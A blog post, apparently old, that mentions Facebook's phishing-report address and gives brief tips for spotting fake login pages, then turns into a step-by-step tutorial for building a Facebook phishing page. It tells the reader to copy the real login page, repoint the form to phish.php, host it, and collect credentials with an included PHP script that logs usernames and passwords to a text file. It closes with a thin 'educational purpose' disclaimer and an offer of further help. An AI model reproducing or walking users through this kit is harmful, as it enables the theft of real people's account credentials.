Facebook’s New security- Report Phishing

On Aug 9, Facebook released an e-mail address phish@fb.com to report facebook phishing site’s.

Phishing is a way of attempting to acquire information such as user names, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

In general it is similar to creating fake login pages on which if you fill and send information i.e. User name and password it will open the website for you but also store your information on attacker’s web server.

Phishing was first used in 1985 on AOL(America Online).

In facebook and google+ it is done by attaching a php script and changing method from post to get as shown below.

To protect against your browser are enabled with Antiphishing software, also various other functionality have been added e.g. certification of sites( Certified sites have https in green in chrome while in mozilla they have a blue tab in address bar. As shown in the pic:- )

 

This is an old pic of mozilla the new updated version has the box in blue.

Manually if you want to check if site is a phishing site read the process below:-

If you find a none certified site and want to be sure that its a phishing site.

1)Just right click on the web page.

2)click view source flie.

3)Now go to top of source page and press ctrl+f. (A find box will open.)

4)type ” action= ” If you find that it contains URL of login page (for facebook the url is “https://www.facebook.com/login.php?login_attempt=1“) it is not a phishing site. For most of phished site you will find that ” action= ” contains file name like phish.php, hack.php, phishing.php, etc

(Click on the Image to Enlarge it)

 

Create your own Phishing page follow the process:-

1> Go to a .php site’s login page e.g. https://www.facebook.com/login.php

2> Right click->view page source-> copy the whole page to a text file.

3> search for “action=” and instead of “https://www.facebook.com/login.php?login_attempt=1” write “phish.php” and method=”get” from “post” and save this page.

4>Now write this code to a text file and save it with the name phish.php.

header(“Location: https://login.facebook.com/r.php?locale=en_US”);
$hand = fopen(“passwords.txt”,”a”);
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “>>”);
fwrite($handle, $value);
fwrite($handle, “<<“);
}
fwrite($handle, “<<“);
fclose($handle);
exit;
?>

(Click on the Image to Enlarge it)

 

5> Get a web server or login into a free web hosting site and upload both the files to file manager and then publish your site once you have published check out the link and enter your information Username and password and login into facebook.

After that go to your server on web hosting site ad login three you’ll find a file named password.txt containing password and e-mail address you entered.

This is just for educational purpose.

At youtube search for facebook phishing you’ll get a lot help about the whole process through videos demonstrating them.

If you find such a phishing site report it to facebook @ phish@fb.com

If you need any help regarding to facebook phishing , ask me.
I will reply in 24 hours. ( to ask, Comment in ‘Leave your Comment’ Section. )




There are no comments

Add yours